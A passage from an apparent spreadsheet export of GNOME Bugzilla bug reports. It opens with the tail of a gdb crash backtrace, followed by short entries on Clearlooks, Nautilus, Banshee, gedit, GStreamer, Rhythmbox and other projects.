        v_int = 16 v_uint = 16 v_long = 16 v_ulong = 16 v_int64 = -5200383287175938032 
        v_uint64 = 13246360786533613584 v_float = 2.24207754e-44 v_double = -9.4256099125266162e-40 
        v_pointer = 0x10}}} {g_type = 3219017720 data = {{v_int = 148766728 v_uint = 148766728 v_long = 148766728 
        v_ulong = 148766728 v_int64 = -4621168447074729976 v_uint64 = 13825575626634821640 v_float = 1.33611463e-33 
        v_double = -0.47361946931778265 v_pointer = 0x8de0008} {v_int = -1210850946 v_uint = 3084116350 
        v_long = -1210850946 v_ulong = 3084116350 v_int64 = 638948234577043838 v_uint64 = 638948234577043838 
        v_float = -2.52581631e-05 v_double = 5.8149638902964594e-266 v_pointer = 0xb7d3e17e}}} {g_type = 137748400 
    data = {{v_int = -1075949608 v_uint = 3219017688 v_long = -1075949608 v_ulong = 3219017688 
        v_int64 = -5200383283956920360 v_uint64 = 13246360789752631256 v_float = -1.73681164 
        v_double = -9.4256151637942156e-40 v_pointer = 0xbfde4fd8} {v_int = -1075949576 v_uint = 3219017720 
        v_long = -1075949576 v_ulong = 3219017720 v_int64 = 8245261258744 v_uint64 = 8245261258744 
        v_float = -1.73681545 v_double = 4.0737003289311638e-311 v_pointer = 0xbfde4ff8}}} {g_type = 3218998143 
---Type  to continue or q  to quit---
    data = {{v_int = -1210850225 v_uint = 3084117071 v_long = -1210850225 v_ulong = 3084117071 v_int64 = 3084117071 
        v_uint64 = 3084117071 v_float = -2.52594746e-05 v_double = 1.5237562925336286e-314 v_pointer = 0xb7d3e44f} {
        v_int = 1078706176 v_uint = 1078706176 v_long = 1078706176 v_ulong = 1078706176 
        v_int64 = -4621168239986360320 v_uint64 = 13825575833723191296 v_float = 3.18359375 
        v_double = -0.47363096503158886 v_pointer = 0x404bc000}}} {g_type = 3084131130 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 4632937379169042432 v_uint64 = 4632937379169042432 v_float = 0 
        v_double = 55 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4643000109586448384 
        v_uint64 = 4643000109586448384 v_float = 0 v_double = 250 v_pointer = 0x0}}} {g_type = 3219017768 data = {{
        v_int = 58657919 v_uint = 58657919 v_long = 58657919 v_ulong = 58657919 v_int64 = 58657919 
        v_uint64 = 58657919 v_float = 7.49521097e-37 v_double = 2.8980862634438527e-316 v_pointer = 0x37f0c7f} {
        v_int = 1072693248 v_uint = 1072693248 v_long = 1072693248 v_ulong = 1072693248 v_int64 = 1072693248 
        v_uint64 = 1072693248 v_float = 1.875 v_double = 5.2998088236266445e-315 v_pointer = 0x3ff00000}}} {
    g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4607182418800017408 
        v_uint64 = 4607182418800017408 v_float = 0 v_double = 1 v_pointer = 0x0}}} {g_type = 0 data = {{
        v_int = -2147483648 v_uint = 2147483648 v_long = -2147483648 v_ulong = 2147483648 v_int64 = 2147483648 
        v_uint64 = 2147483648 v_float = -0 v_double = 1.0609978954826362e-314 v_pointer = 0x80000000} {
        v_int = -2147483648 v_uint = 2147483648 v_long = -2147483648 v_ulong = 2147483648 v_int64 = 2147483648 
        v_uint64 = 2147483648 v_float = -0 v_double = 1.0609978954826362e-314 v_pointer = 0x80000000}}} {
    g_type = 1081032704 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4632937379169042432 
        v_uint64 = 4632937379169042432 v_float = 0 v_double = 55 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 4643000109586448384 v_uint64 = 4643000109586448384 v_float = 0 v_double = 250 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 1078689792 v_uint = 1078689792 v_long = 1078689792 
        v_ulong = 1078689792 v_int64 = 72246058281566208 v_uint64 = 72246058281566208 v_float = 3.1796875 
        v_double = 7.5962370187536836e-304 v_pointer = 0x404b8000} {v_int = -1227070188 v_uint = 3067897108 
        v_long = -1227070188 v_ulong = 3067897108 v_int64 = 639199816565155092 v_uint64 = 639199816565155092 
        v_float = -6.56827797e-06 v_double = 5.9882100412697139e-266 v_pointer = 0xb6dc6514}}} {g_type = 148825304 
    data = {{v_int = -1075949368 v_uint = 3219017928 v_long = -1075949368 v_ulong = 3219017928 
        v_int64 = 312456663240 v_uint64 = 312456663240 v_float = -1.73684025 v_double = 1.5437410312107148e-312 
        v_pointer = 0xbfde50c8} {v_int = 148766728 v_uint = 148766728 v_long = 148766728 v_ulong = 148766728 
        v_int64 = 148766728 v_uint64 = 148766728 v_float = 1.33611463e-33 v_double = 7.3500529549009056e-316 
        v_pointer = 0x8de0008}}} {g_type = 1081032704 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 4632937379169042432 v_uint64 = 4632937379169042432 v_float = 0 v_double = 55 v_pointer = 0x0} {
        v_int = 148825472 v_uint = 148825472 v_long = 148825472 v_ulong = 148825472 v_int64 = 639200552380458368 
        v_uint64 = 639200552380458368 v_float = 1.34150942e-33 v_double = 5.9887167435582076e-266 
        v_pointer = 0x8dee580}}}}
        free_me = (GValue *) 0x0
        signal_return_type = 4
        param_values = (GValue *) 0xbfde4f50
        node = (SignalNode *) 0x85cd350
        i = 1
        n_params = 1
        __PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#6  0xb75c27d9 in IA__g_signal_emit (instance=0x8d9d9d0 signal_id=513 detail=0) at gsignal.c:2243
        var_args = 0xbfde517c pï¿½ï¿½\bpï¿½]ï¿½pï¿½]ï¿½ï¿½QÞ¿\211ï¿½[ï¿½`ï¿½I\b\210ï¿½v\bï¿½ï¿½ï¿½\b\002
#7  0xb71ee3ec in e_book_view_handle_response (listener=0x849f060 resp=0x8 book_view=0x0) at e-book-view.c:46
---Type  to continue or q  to quit---
No locals.
#8  0xb75bcf89 in IA__g_cclosure_marshal_VOID__POINTER (closure=0x8e85ef8 return_value=0x0 n_param_values=2 
    param_values=0xbfde53cc invocation_hint=0xbfde52dc marshal_data=0xb71ee370) at gmarshal.c:601
        data1 = (gpointer) 0x849f060
        data2 = 
        __PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__POINTER
#9  0xb75b062b in IA__g_closure_invoke (closure=0x8e85ef8 return_value=0x0 n_param_values=2 param_values=0xbfde53cc 
    invocation_hint=0xbfde52dc) at gclosure.c:490
        marshal = (GClosureMarshal) 0xb75bcf30 
        marshal_data = (gpointer) 0x0
        __PRETTY_FUNCTION__ = IA__g_closure_invoke
#10 0xb75c10f3 in signal_emit_unlocked_R (node=0x8b1bbb0 detail=0 instance=0x849f060 emission_return=0x0 
    instance_and_params=0xbfde53cc) at gsignal.c:2440
        tmp = 
        handler = (Handler *) 0x8904140
        accumulator = (SignalAccumulator *) 0x0
        emission = {next = 0x0 instance = 0x849f060 ihint = {signal_id = 511 detail = 0 
    run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN chain_type = 4}
        class_closure = (GClosure *) 0x87ce1e8
        handler_list = (Handler *) 0x8904140
        return_accu = (GValue *) 0x0
        accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
      v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
      v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
        signal_id = 511
        max_sequential_handler_number = 25243
        return_value_altered = 0
#11 0xb75c2617 in IA__g_signal_emit_valist (instance=0x849f060 signal_id=511 detail=0 
    var_args=0xbfde5610 ï¿½\211\006\b) at gsignal.c:2199
        _flags = 
        _vtable = 
        _cvalues = {{v_int = -1212383339 v_long = -1212383339 v_int64 = 7377551253 v_double = 3.6449946245403427e-314 
    v_pointer = 0xb7bc7f95} {v_int = -1218816792 v_long = -1218816792 v_int64 = -4621162259394439960 
    v_double = -0.4739629545741324 v_pointer = 0xb75a54e8} {v_int = -1219140158 v_long = -1219140158 
    v_int64 = 578300513210426818 v_double = 5.3322868238829778e-270 v_pointer = 0xb75565c2} {v_int = -1223196684 
    v_long = -1223196684 v_int64 = 578767874367651828 v_double = 5.7251548828812395e-270 v_pointer = 0xb7177ff4} {
    v_int = -1220965444 v_long = -1220965444 v_int64 = -4621162465555018820 v_double = -0.47395151036306138 
    v_pointer = 0xb7398bbc} {v_int = -1224688656 v_long = -1224688656 v_int64 = -4621162396839265296 
    v_double = -0.47395532485364722 v_pointer = 0xb700bbf0} {v_int = 16 v_long = 16 v_int64 = 578301128609890320 
    v_double = 5.3328041342948446e-270 v_pointer = 0x10} {v_int = 1 v_long = 1 v_int64 = 90194313217 
    v_double = 4.4561911610764784e-313 v_pointer = 0x1}}
        _lcopy_format = 
        _n_values = 
        return_value = {g_type = 3070291374 data = {{v_int = -1224689668 v_uint = 3070277628 v_long = -1224689668 
      v_ulong = 3070277628 v_int64 = 641867266136258556 v_uint64 = 641867266136258556 v_float = -7.67223173e-06 
      v_double = 9.4475750547553575e-266 v_pointer = 0xb700b7fc} {v_int = -1075948088 v_uint = 3219019208 
---Type  to continue or q  to quit---
      v_long = -1075948088 v_ulong = 3219019208 v_int64 = 7513986504 v_uint64 = 7513986504 v_float = -1.73699284 
      v_double = 3.7124025949411703e-314 v_pointer = 0xbfde55c8}}}
        error = 
        instance_and_params = (GValue *) 0xbfde53cc
        stack_values = {{g_type = 145865600 data = {{v_int = 139063392 v_uint = 139063392 v_long = 139063392 
        v_ulong = 139063392 v_int64 = 139063392 v_uint64 = 139063392 v_float = 6.07687968e-34 
        v_double = 6.8706444581354438e-316 v_pointer = 0x849f060} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 68 data = {{
        v_int = 142012296 v_uint = 142012296 v_long = 142012296 v_ulong = 142012296 v_int64 = 142012296 
        v_uint64 = 142012296 v_float = 7.43094999e-34 v_double = 7.0163396740638273e-316 v_pointer = 0x876ef88} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 3070278640 data = {{v_int = -1208758005 v_uint = 3086209291 
        v_long = -1208758005 v_ulong = 3086209291 v_int64 = -5200383284089728757 v_uint64 = 13246360789619822859 
        v_float = -2.90652006e-05 v_double = -9.425614947140409e-40 v_pointer = 0xb7f3d10b} {v_int = 148848720 
        v_uint = 148848720 v_long = 148848720 v_ulong = 148848720 v_int64 = -4621163361833369520 
        v_uint64 = 13825580711876182096 v_float = 1.34364441e-33 v_double = -0.47390175691999037 
        v_pointer = 0x8df4050}}} {g_type = 17 data = {{v_int = -1210855530 v_uint = 3084111766 v_long = -1210855530 
        v_ulong = 3084111766 v_int64 = 639300387535572886 v_uint64 = 639300387535572886 v_float = -2.52498248e-05 
        v_double = 6.0574659274137682e-266 v_pointer = 0xb7d3cf96} {v_int = -1075948488 v_uint = 3219018808 
        v_long = -1075948488 v_ulong = 3219018808 v_int64 = 3219018808 v_uint64 = 3219018808 v_float = -1.73694515 
        v_double = 1.5904066063496396e-314 v_pointer = 0xbfde5438}}} {g_type = 1 data = {{v_int = 134819188 
        v_uint = 134819188 v_long = 134819188 v_ulong = 134819188 v_int64 = -5253589754220827276 
        v_uint64 = 13193154319488724340 v_float = 4.12803678e-34 v_double = -2.6344206397925221e-43 
        v_pointer = 0x8092d74} {v_int = -1224073295 v_uint = 3070894001 v_long = -1224073295 v_ulong = 3070894001 
        v_int64 = 596498667595767729 v_uint64 = 596498667595767729 v_float = -8.23281971e-06 
        v_double = 8.7788059073442232e-269 v_pointer = 0xb70a1fb1}}} {g_type = 3219018880 data = {{
        v_int = -1224065196 v_uint = 3070902100 v_long = -1224065196 v_ulong = 3070902100 
        v_int64 = -5253570870608511148 v_uint64 = 13193173203101040468 v_float = -8.24018571e-06 
        v_double = -2.6419414723009682e-43 v_pointer = 0xb70a3f54} {v_int = 148801840 v_uint = 148801840 
        v_long = 148801840 v_ulong = 148801840 v_int64 = 292206577968 v_uint64 = 292206577968 
        v_float = 1.33933916e-33 v_double = 1.4436923166282048e-312 v_pointer = 0x8de8930}}} {g_type = 0 data = {{
        v_int = 200 v_uint = 200 v_long = 200 v_ulong = 200 v_int64 = 893353197768 v_uint64 = 893353197768 
        v_float = 2.80259693e-43 v_double = 4.4137512461958977e-312 v_pointer = 0xc8} {v_int = 32 v_uint = 32 
        v_long = 32 v_ulong = 32 v_int64 = -5253986626513666016 v_uint64 = 13192757447195885600 
        v_float = 4.48415509e-44 v_double = -2.4763571299240254e-43 v_pointer = 0x20}}} {g_type = 136 data = {{
        v_int = -1218662172 v_uint = 3076305124 v_long = -1218662172 v_ulong = 3076305124 v_int64 = 312313950436 
        v_uint64 = 312313950436 v_float = -1.31542074e-05 v_double = 1.543035936273934e-312 v_pointer = 0xb75cb0e4} {
        v_int = -2147483648 v_uint = 2147483648 v_long = -2147483648 v_ulong = 2147483648 
        v_int64 = 134638121546416128 v_uint64 = 134638121546416128 v_float = -0 v_double = 1.132261407982678e-299 
        v_pointer = 0x80000000}}} {g_type = 3084158708 data = {{v_int = 148848720 v_uint = 148848720 
        v_long = 148848720 v_ulong = 148848720 v_int64 = 4618300628989329488 v_uint64 = 4618300628989329488 
        v_float = 1.34364441e-33 v_double = 5.8749543558370334 v_pointer = 0x8df4050} {v_int = 148801840 
        v_uint = 148801840 v_long = 148801840 v_ulong = 148801840 v_int64 = -5227269335623497424 
        v_uint64 = 13219474738086054192 v_float = 1.33933916e-33 v_double = -1.5073023520220897e-41 
        v_pointer = 0x8de8930}}} {g_type = 143390840 data = {{v_int = -1075948080 v_uint = 3219019216 
        v_long = -1075948080 v_ulong = 3219019216 v_int64 = -4621163083885292080 v_uint64 = 13825580989824259536 
---Type  to continue or q  to quit---
        v_float = -1.73699379 v_double = -0.47391718613775158 v_pointer = 0xbfde55d0} {v_int = -1217348391 
        v_uint = 3077618905 v_long = -1217348391 v_ulong = 3077618905 v_int64 = 615858971423587545 
        v_uint64 = 615858971423587545 v_float = -1.43490843e-05 v_double = 1.6942423040243648e-267 
        v_pointer = 0xb770bcd9}}} {g_type = 134787976 data = {{v_int = -1223192288 v_uint = 3071775008 
        v_long = -1223192288 v_ulong = 3071775008 v_int64 = -5227269332700524256 v_uint64 = 13219474741009027360 
        v_float = -9.03409091e-06 v_double = -1.5073030970724754e-41 v_pointer = 0xb7179120} {v_int = -1217068484 
        v_uint = 3077898812 v_long = -1217068484 v_ulong = 3077898812 v_int64 = 615858971423867452 
        v_uint64 = 615858971423867452 v_float = -1.46036582e-05 v_double = 1.6942423040845997e-267 
        v_pointer = 0xb775023c}}} {g_type = 3070894001 data = {{v_int = -1218662172 v_uint = 3076305124 
        v_long = -1218662172 v_ulong = 3076305124 v_int64 = 615858971422273764 v_uint64 = 615858971422273764 
        v_float = -1.31542074e-05 v_double = 1.6942423037416445e-267 v_pointer = 0xb75cb0e4} {v_int = 134787672 
        v_uint = 134787672 v_long = 134787672 v_ulong = 134787672 v_int64 = 578469835060064856 
        v_uint64 = 578469835060064856 v_float = 4.11356534e-34 v_double = 5.4746203177665207e-270 
        v_pointer = 0x808b258}}} {g_type = 3077459274 data = {{v_int = -1217068484 v_uint = 3077898812 
        v_long = -1217068484 v_ulong = 3077898812 v_int64 = 4635303909227037244 v_uint64 = 4635303909227037244 
        v_float = -1.46036582e-05 v_double = 79.630414833322845 v_pointer = 0xb775023c} {v_int = -1075948328 
        v_uint = 3219018968 v_long = -1075948328 v_ulong = 3219018968 v_int64 = -5260023693750414120 
        v_uint64 = 13186720379959137496 v_float = -1.73696423 v_double = -9.3280920940162692e-44 
        v_pointer = 0xbfde54d8}}} {g_type = 24 data = {{v_int = -1223289088 v_uint = 3071678208 v_long = -1223289088 
        v_ulong = 3071678208 v_int64 = -4621162809154726144 v_uint64 = 13825581264554825472 v_float = -8.94605182e-06 
        v_double = -0.4739324367477451 v_pointer = 0xb7161700} {v_int = -1212383339 v_uint = 3082583957 
        v_long = -1212383339 v_ulong = 3082583957 v_int64 = 24419971661717 v_uint64 = 24419971661717 
        v_float = -2.24707564e-05 v_double = 1.2065069070471148e-310 v_pointer = 0xb7bc7f95}}} {g_type = 3076150504 
    data = {{v_int = -1075948232 v_uint = 3219019064 v_long = -1075948232 v_ulong = 3219019064 
        v_int64 = -5244155198340967112 v_uint64 = 13202588875368584504 v_float = -1.73697567 
        v_double = -1.1218500941816305e-42 v_pointer = 0xbfde5538} {v_int = 134646080 v_uint = 134646080 
        v_long = 134646080 v_ulong = 134646080 v_int64 = 600078640159820096 v_uint64 = 600078640159820096 
        v_float = 4.04854948e-34 v_double = 1.5073101899428317e-268 v_pointer = 0x8068940}}} {g_type = 3219019032 
    data = {{v_int = -1224683083 v_uint = 3070284213 v_long = -1224683083 v_ulong = 3070284213 
        v_int64 = -5207109546488573515 v_uint64 = 13239634527220978101 v_float = -7.67822075e-06 
        v_double = -3.2866417028477399e-40 v_pointer = 0xb700d1b5} {v_int = 1 v_uint = </t>
  </si>
  <si>
    <t>GTK-ENGINES-486431</t>
  </si>
  <si>
    <t>clearlooks</t>
  </si>
  <si>
    <t>GTK-ENGINES</t>
  </si>
  <si>
    <t>Clearlooks needs xthickness = 1 on menus</t>
  </si>
  <si>
    <t>For menus we need an xthickness of 1. This is needed to draw a border in comboboxes that are scrolled off the screen. The disadvantage is that the border cannot change the color for active items.</t>
  </si>
  <si>
    <t>gtk-engines-maint</t>
  </si>
  <si>
    <t>GTKMM-148376</t>
  </si>
  <si>
    <t>fileselection example</t>
  </si>
  <si>
    <t xml:space="preserve">in http://www.gtkmm.org/docs/gtkmm-2.4/docs/tutorial/html/ch13s02.html 
(fileselection example)
it says #include 
where i think it should be #include </t>
  </si>
  <si>
    <t>schwein</t>
  </si>
  <si>
    <t>NAUTILUS-451380</t>
  </si>
  <si>
    <t>show XMP metadata as well</t>
  </si>
  <si>
    <t>Nautilus should show XMP metadata as well
Will attach patch.</t>
  </si>
  <si>
    <t>DASHER-311367</t>
  </si>
  <si>
    <t>[4.0] Pause outside of window</t>
  </si>
  <si>
    <t>Make pause outside of window work</t>
  </si>
  <si>
    <t>DOXYGEN-465020</t>
  </si>
  <si>
    <t>@endcond eats the next definition brief description</t>
  </si>
  <si>
    <t>If you have something like that:
/// @cond
#define SKIPPED
/// @endcond
/**
Brief. Documentation.
*/
#define DOCUMENTED
Then no documentation for DOCUMENTED will appear in the Defines section on the documentation page but full documentation will appear in Define Documentation section</t>
  </si>
  <si>
    <t>tadeusz.dracz</t>
  </si>
  <si>
    <t>GNOME-MEDIA-133891</t>
  </si>
  <si>
    <t>Failure at installation of the new circuit in gconf</t>
  </si>
  <si>
    <t>alexhack</t>
  </si>
  <si>
    <t>GNUMERIC-114078</t>
  </si>
  <si>
    <t>18.4 - Little black bar on top of graphs</t>
  </si>
  <si>
    <t>http://www.gnome.org/~chema/gnumeric_18_4.png</t>
  </si>
  <si>
    <t>NAUTILUS-45099</t>
  </si>
  <si>
    <t>Need configuration preferences for inventory control.</t>
  </si>
  <si>
    <t xml:space="preserve">We need to add configuration preferences so that users have the ability to do
the following:
1) never upload inventory
2) automatically upload inventory
3) warn a user when an inventory transfer is happening
4) only upload a subset of information
Breakup of bug #41627.
------- Additional Comments From mjs@noisehavoc.org 2001-01-11 06:15:49 ----
Ian and I have completed a first cut at a configuration screen. It is in
desperate need of Arlofication.
------- Additional Comments From albert@eazel.com 2001-02-07 14:13:44 ----
QA assigning to Sherry (client inventory and vault components)
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:46 -------
Bug depends on bug(s) 41814.
The original reporter (pepper@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>EVOLUTION-211749</t>
  </si>
  <si>
    <t>count bar not updated when switching to contacts</t>
  </si>
  <si>
    <t>When switching (back) to the Contacts component the count bar isn't
updated if you're coming from a mail folder - it still displays mail
message counts.
See attached screenshot-lett.</t>
  </si>
  <si>
    <t>trow</t>
  </si>
  <si>
    <t>BANSHEE-396849</t>
  </si>
  <si>
    <t>crash during build</t>
  </si>
  <si>
    <t>This is banshee 0.11.4 on Mandriva Cooker. The program gconf-schema-extractor crashes during the build:
[goetz@n5 Banshee.Base]$ make
if test -w banshee-core.schemas.in -o \( ! -e banshee-core.schemas.in -a -w . \) then \
		MONO_PATH=../../../ext/hal-sharp:../../../ext/taglib-sharp:../../../ext/dbus-sharp:../../../src/Extras/Last.FM:../../../src/Extras/MusicBrainz:../../../src/Extras/Gnome.Keyring:../../../src/Core/Banshee.Widgets:../../../src/Core/Banshee.Base:../../../src/Extras/Boo:../../../src/Extras/BooBuddy /usr/bin/mono ../../../build/gconf-schema-extractor.exe Banshee.Base.dll ./banshee-core.schemas.in \
	fi
(../../../build/gconf-schema-extractor.exe:32014): GLib-GObject-CRITICAL **: gtype.c:2242: initialization assertion failed use IA__g_type_init() prior to this function
(../../../build/gconf-schema-extractor.exe:32014): GLib-GObject-CRITICAL **: g_object_new: assertion `G_TYPE_IS_OBJECT (object_type)' failed
(../../../build/gconf-schema-extractor.exe:32014): GLib-GObject-CRITICAL **: g_object_ref: assertion `G_IS_OBJECT (object)' failed
Stacktrace:
  at (wrapper managed-to-native) GConf.Client.gconf_client_get_default () 
  at (wrapper managed-to-native) GConf.Client.gconf_client_get_default () 
  at GConf.Client..ctor () 
  at Banshee.Configuration.GConfConfigurationClient.Get (stringstringstring) 
  at Banshee.Configuration.GConfConfigurationClient.Get (Banshee.Configuration.SchemaEntry`1) 
  at Banshee.Configuration.ConfigurationClient.Get (Banshee.Configuration.SchemaEntry`1) 
  at Banshee.Configuration.SchemaEntry`1.Get () 
  at Banshee.IO.IOProxy.Reload () 
  at Banshee.IO.IOProxy..cctor () 
  at (wrapper runtime-invoke) System.Object.runtime_invoke_void (objectintptrintptrintptr) 
  at (wrapper managed-to-native) System.Reflection.MonoField.GetValueInternal (object) 
  at (wrapper managed-to-native) System.Reflection.MonoField.GetValueInternal (object) 
  at System.Reflection.MonoField.GetValue (object) 
  at GConfSchemaExtractor.Main (string[]) 
  at (wrapper runtime-invoke) System.Object.runtime_invoke_void_string[] (objectintptrintptrintptr) 
Native stacktrace:
	/usr/bin/mono [0x815a567]
	/usr/bin/mono [0x81246a1]
	[0xbfffe440]
	/usr/lib/libgconf-2.so.4 [0x4130a80e]
	/usr/lib/libgconf-2.so.4(gconf_client_get_default+0xac) [0x4130dffc]
	[0x412b9172]
	[0x412b8fe7]
	[0x412b8ee6]
	[0x412b8e7f]
	[0x412b8e01]
	[0x412b87f8]
	[0x412b860c]
	[0x412b856a]
	[0x412a500e]
	/usr/bin/mono(mono_runtime_class_init+0x1aa) [0x809196a]
Debug info from gdb:
=================================================================
Got a SIGSEGV while executing native code. This usually indicates
a fatal error in the mono runtime or one of the native libraries 
used by your application.
=================================================================
/bin/sh: line 2: 32014 Abgebrochen             MONO_PATH=../../../ext/hal-sharp:../../../ext/taglib-sharp:../../../ext/dbus-sharp:../../../src/Extras/Last.FM:../../../src/Extras/MusicBrainz:../../../src/Extras/Gnome.Keyring:../../../src/Core/Banshee.Widgets:../../../src/Core/Banshee.Base:../../../src/Extras/Boo:../../../src/Extras/BooBuddy /usr/bin/mono ../../../build/gconf-schema-extractor.exe Banshee.Base.dll ./banshee-core.schemas.in
make: *** [banshee-core.schemas.in] Fehler 134
This is with mono 1.2.2.1 gtk-sharp 2.10.0 gnome-sharp 2.16.0 and latest gnome 2.17.5.</t>
  </si>
  <si>
    <t>goetz.waschk</t>
  </si>
  <si>
    <t>GDESKLETS-126950</t>
  </si>
  <si>
    <t>build_system</t>
  </si>
  <si>
    <t>GDESKLETS</t>
  </si>
  <si>
    <t>Error compile with libgtop2-2.5.0</t>
  </si>
  <si>
    <t>Not found glibtop/xmalloc.h
Solution
remove #include  in file libdesklets/glibtop.c for
libgtop2 &gt;= 2.5.0.
-&gt; compile ok.</t>
  </si>
  <si>
    <t>gdesklets-maint</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS-407366</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS</t>
  </si>
  <si>
    <t>Let the build tool traverse parent directories.</t>
  </si>
  <si>
    <t>Please describe the problem:
Let the build tool traverse parent directories as the tool doesn't work for projects having a single Makefile in the top level folder but no make scripts in the source folder(s).
Steps to reproduce:
1. Untar the attached mini project.
2. Open src/hello-world.c of that project in gedit.
3. Hit F8 to activate the build tool.
Actual results:
The shell output window opens and shows:
Running tool: Build
make: *** No targets specified and no makefile found.  Stop.
Exited: 512
Expected results:
The shell output window opens and shows:
Running tool: Build
cc     src/hello-world.c   -o src/hello-world
Done.
Does this happen every time?
Yes.
Other information:
Changing the Build to execute this command produces the expected output:
while ! test \
	-f Makefile -o \
	-f makefile -o \
	-f GNUmakefile &amp;&amp; \
	test $PWD != /
do 
	cd ..
done
make</t>
  </si>
  <si>
    <t>GSTREAMER-752791</t>
  </si>
  <si>
    <t>basesink: drops first few buffers with dts/pts b-frame shift</t>
  </si>
  <si>
    <t>gst-launch-1.0 videotestsrc ! x264enc ! identity dump=true ! fakesink dump=true | grep ^0000000 | head -n 5
Should show each line twice but the first two lines are only shown once because basesink drops the first two buffers as out of segment.</t>
  </si>
  <si>
    <t>GTK+-122725</t>
  </si>
  <si>
    <t>Warning in gtktreeitem.c</t>
  </si>
  <si>
    <t>Found this warning in gtktreeitem.c:
gtktreeitem.c: In function `gtk_tree_item_add_pixmaps':
gtktreeitem.c:396: warning: passing arg 4 of `gdk_pixmap_create_from_xpm_d'
from incompatible pointer type
gtktreeitem.c:403: warning: passing arg 4 of `gdk_pixmap_create_from_xpm_d'
from incompatible pointer type
Attaching a patch that casts arg 4 to gchar **</t>
  </si>
  <si>
    <t>GNOME-MAIN-MENU-379100</t>
  </si>
  <si>
    <t>GNOME-MAIN-MENU</t>
  </si>
  <si>
    <t>Show tooltips with description when hovering over application icon</t>
  </si>
  <si>
    <t>The current gnome menu applet shows a description of what the application does when hovering over it's icon</t>
  </si>
  <si>
    <t>gnome-main-menu-maint</t>
  </si>
  <si>
    <t>RHYTHMBOX-146760</t>
  </si>
  <si>
    <t>resizing the genreplaylist collum makes it expand and contrast on both sides of the collum</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Slackware Slackware 9.1.0
Package: rhythmbox
Severity: normal
Version: GNOME2.6.1 unspecified
Gnome-Distributor: Dropline Systems
Synopsis: resizing the genreplaylist collum makes it expand and contrast on both sides of the collum
Bugzilla-Product: rhythmbox
Bugzilla-Component: Interface
Bugzilla-Version: unspecified
Description:
Description of Problem:
When you try and resize the lengh of the Genre and Artist collum in
the rhythmbox playlist. both sides of the collums will expand and
contrast when dragging with the mouse. When you click and drag the
collum to make it smaller the left border thats shared with the
previous collum will exteend out dramatically. But as you drag towards
the left it'll resize back to its orgional size but will not go any
smaller.. But when you try to make the collum wider this extends both
collum borders even further apart when only the collum border that you
slected should resize.
The Track and Title collum behavor seems to be fine though.
Steps to reproduce the problem:
1. mouse over the Genre or Aritst collum till your cursor changes to
the resize arrow thing
2. Click and drag Dragging left or right
3. 
Actual Results:
not ideal playlist collum widths 
Expected Results:
Good behavor just like any other collum resizing in programs
How often does this happen? 
Every time you try it. 
Additional Information:
Dropline Gnome 2.6.1
Rhythmbox 0.8.4
GTK+ 1.2.10-i386
GTK+ 2.4.1-i686
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-07-09 06:16 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product rhythmbox.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was schrambo@westnet.com.au.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>schrambo</t>
  </si>
  <si>
    <t>NAUTILUS-73006</t>
  </si>
  <si>
    <t>Views: List View</t>
  </si>
  <si>
    <t>selection lost when changing view from View as Icons to View as List</t>
  </si>
  <si>
    <t>This is almost certainly missing code in the new View as List
implementation. There's code that preserves the selection when you
change views but it doesn't seem to be working.</t>
  </si>
  <si>
    <t>GNOME-PYTHON-136617</t>
  </si>
  <si>
    <t>GNOME-PYTHON</t>
  </si>
  <si>
    <t>Gnome CanvasBpath object cannot be used from python.</t>
  </si>
  <si>
    <t>This is currently not possible to assign anything to the bpath parameter
of a gnome.CanvasBpath python object. As Gustavo JoÐŸÐ»Ðºo Alves Marques
Carneiro pointed out this is because the original gnomecanvas type for this
parameter is something like a pointer to a GnomeCanvasPathDef object that
is unfortunatelly not provided in python.</t>
  </si>
  <si>
    <t>gabor</t>
  </si>
  <si>
    <t>GIMP-WEB-433164</t>
  </si>
  <si>
    <t>www.gimp.org</t>
  </si>
  <si>
    <t>GIMP-WEB</t>
  </si>
  <si>
    <t>Out-dated dlcompat info</t>
  </si>
  <si>
    <t>The description of the dlcompat library on the http://www.gimp.org/macintosh/ webpage is out of date. Starting in 10.3 OS X itself has dlopen() and related functions built-in and no external library is needed.</t>
  </si>
  <si>
    <t>web-bugs</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-449336</t>
  </si>
  <si>
    <t>segfault in the background-setting idle</t>
  </si>
  <si>
    <t>pretty obvious oversight.</t>
  </si>
  <si>
